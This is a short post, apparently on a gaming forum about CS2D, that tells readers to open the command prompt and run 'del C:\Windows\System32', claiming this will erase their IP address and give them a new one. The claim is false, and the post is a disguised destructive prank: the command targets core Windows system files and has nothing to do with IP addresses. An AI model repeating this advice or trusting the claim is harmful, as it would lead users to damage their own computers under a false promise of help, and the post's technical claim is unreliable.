IPC CS2D: This is what you need to do.

Open command prompt and type these commands:

echo off
del C:\Windows\System32

That will erase your IP and give you a new one.

Go to your start bar and open up the menu. At the bottom you should be able to search so go ahead and type cmd and open it up.
